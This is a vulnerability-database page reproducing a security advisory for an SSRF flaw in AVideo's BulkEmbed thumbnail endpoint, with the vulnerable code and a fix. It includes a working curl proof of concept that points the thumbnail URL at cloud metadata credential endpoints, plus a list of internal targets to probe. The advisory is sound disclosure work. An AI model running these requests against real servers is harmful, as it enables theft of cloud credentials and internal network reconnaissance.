Skip to main content

PHP CVE-2026-33294

MEDIUM
Server-Side Request Forgery (SSRF) (CWE-918)
2026-03-19 https://github.com/WWBN/AVideo GHSA-66cw-h2mj-j39p
5.0
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.0 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

2
Analysis Generated
Mar 19, 2026 - 18:00 vuln.today
CVE Published
Mar 19, 2026 - 17:12 nvd
MEDIUM 5.0

DescriptionGitHub Advisory

Summary

The BulkEmbed plugin's save endpoint (plugin/BulkEmbed/save.json.php) fetches user-supplied thumbnail URLs via url_get_contents() without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with isSSRFSafeURL(), this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail.

Details

When saving bulk-embedded videos, user-supplied thumbnail URLs from $_POST['itemsToSave'][x]['thumbs'] flow directly into url_get_contents() with no SSRF validation:

plugin/BulkEmbed/save.json.php:68-105

php
foreach ($_POST['itemsToSave'] as $value) {
    foreach ($value as $key => $value2) {
        $value[$key] = xss_esc($value2);  // HTML entity encoding - irrelevant for SSRF
    }
    // ...
    $poster = Video::getPathToFile("{$paths['filename']}.jpg");
    $thumbs = $value['thumbs'];              // ← attacker-controlled URL
    if (!empty($thumbs)) {
        $contentThumbs = url_get_contents($thumbs);  // ← fetched without SSRF check
        if (!empty($contentThumbs)) {
            make_path($poster);
            $bytes = file_put_contents($poster, $contentThumbs);  // ← response saved to disk
        }
    }
    // ...
    $videos->setStatus('a');  // ← video set to active, thumbnail publicly accessible

The url_get_contents() function internally calls isValidURLOrPath() which only validates URL format (scheme, host presence) - it does not block requests to private IPs, localhost, or cloud metadata endpoints.

All other URL-fetching endpoints are protected. The isSSRFSafeURL() function is called in:

  • plugin/Scheduler/Scheduler.php
  • plugin/LiveLinks/proxy.php (two call sites)
  • plugin/AI/receiveAsync.json.php
  • objects/aVideoEncoder.json.php
  • objects/aVideoEncoderReceiveImage.json.php

BulkEmbed is the only URL-fetching endpoint that was not hardened.

This is a full-read SSRF, not blind - the HTTP response body is written to disk as the video thumbnail and served to the attacker when they view the video poster image.

PoC

Prerequisites: Authenticated session with BulkEmbed permission. The onlyAdminCanBulkEmbed option defaults to true (line 41 of BulkEmbed.php), but is commonly disabled for multi-user platforms.

Step 1: Authenticate and obtain session cookie

bash
COOKIE=$(curl -s -c - "http://avideo.local/user" \
  -d "user=testuser&pass=testpass&redirectUri=/" | grep PHPSESSID | awk '{print $NF}')

Step 2: Send BulkEmbed save request with internal URL as thumbnail

bash
curl -s -b "PHPSESSID=$COOKIE" \
  "http://avideo.local/plugin/BulkEmbed/save.json.php" \
  -d "itemsToSave[0][title]=SSRF+Test" \
  -d "itemsToSave[0][description]=test" \
  -d "itemsToSave[0][duration]=PT1M" \
  -d "itemsToSave[0][link]=https://www.youtube.com/watch?v=dQw4w9WgXcQ" \
  -d "itemsToSave[0][thumbs]=http://169.254.169.254/latest/meta-data/iam/security-credentials/" \
  -d "itemsToSave[0][date]="

Expected response:

json
{"error":false,"msg":[{"video":{...},"value":{...},"videos_id":123}],"playListId":0}

Step 3: Retrieve the SSRF response from the saved thumbnail

bash
# Extract the filename from the response, then fetch the poster image
curl -s "http://avideo.local/videos/{filename}.jpg"

The content of the internal HTTP response (e.g., AWS IAM role names from the metadata service) is returned as the image file content.

Cloud metadata example targets:

  • http://169.254.169.254/latest/meta-data/iam/security-credentials/ - AWS IAM role names
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/{role} - temporary AWS credentials
  • http://metadata.google.internal/computeMetadata/v1/ - GCP metadata (requires header, may not work)
  • http://169.254.169.254/metadata/instance?api-version=2021-02-01 - Azure instance metadata

Internal network scanning:

  • http://10.0.0.1:8080/ - probe internal services
  • http://localhost:3306/ - probe local database ports

Impact

  • Cloud credential theft: On AWS/GCP/Azure-hosted instances, an attacker can retrieve cloud IAM credentials from the metadata service, potentially gaining access to cloud infrastructure (S3 buckets, databases, other services).
  • Internal network reconnaissance: Attacker can map internal network topology by probing private IP ranges and observing which requests return content vs. timeout.
  • Internal service data exfiltration: Any HTTP-accessible internal service (admin panels, monitoring dashboards, databases with HTTP interfaces) can have its responses exfiltrated through the thumbnail mechanism.
  • Scope change: The attack crosses security boundaries - from the web application into the internal network/cloud infrastructure, which is a different trust zone.

Recommended Fix

Add isSSRFSafeURL() validation before the url_get_contents() call in plugin/BulkEmbed/save.json.php, consistent with all other URL-fetching endpoints:

php
    $thumbs = $value['thumbs'];
    if (!empty($thumbs)) {
        if (!isSSRFSafeURL($thumbs)) {
            _error_log("BulkEmbed: SSRF protection blocked thumbnail URL: " . $thumbs);
            continue;
        }
        $contentThumbs = url_get_contents($thumbs);
        if (!empty($contentThumbs)) {
            make_path($poster);
            $bytes = file_put_contents($poster, $contentThumbs);
            _error_log("thumbs={$thumbs} poster=$poster bytes=$bytes strlen=" . strlen($contentThumbs));
        } else {
            _error_log("ERROR thumbs={$thumbs} poster=$poster");
        }
    }

AnalysisAI

The BulkEmbed plugin in AVideo fails to validate thumbnail URLs in its save endpoint, allowing authenticated attackers to conduct Server-Side Request Forgery (SSRF) attacks and retrieve responses from internal network resources. An attacker can supply malicious URLs via the bulk embed feature to force the server to make HTTP requests to internal systems and view the cached thumbnail responses. This vulnerability affects PHP-based AVideo installations and requires authentication to exploit.

Technical ContextAI

Server-Side Request Forgery allows an attacker to induce the server to make HTTP requests to arbitrary destinations, including internal services. This vulnerability is classified as Server-Side Request Forgery (SSRF) (CWE-918).

RemediationAI

Validate and whitelist allowed URLs and IP ranges. Block requests to internal/private IP ranges. Use network segmentation to limit server-side request scope.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-33294 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy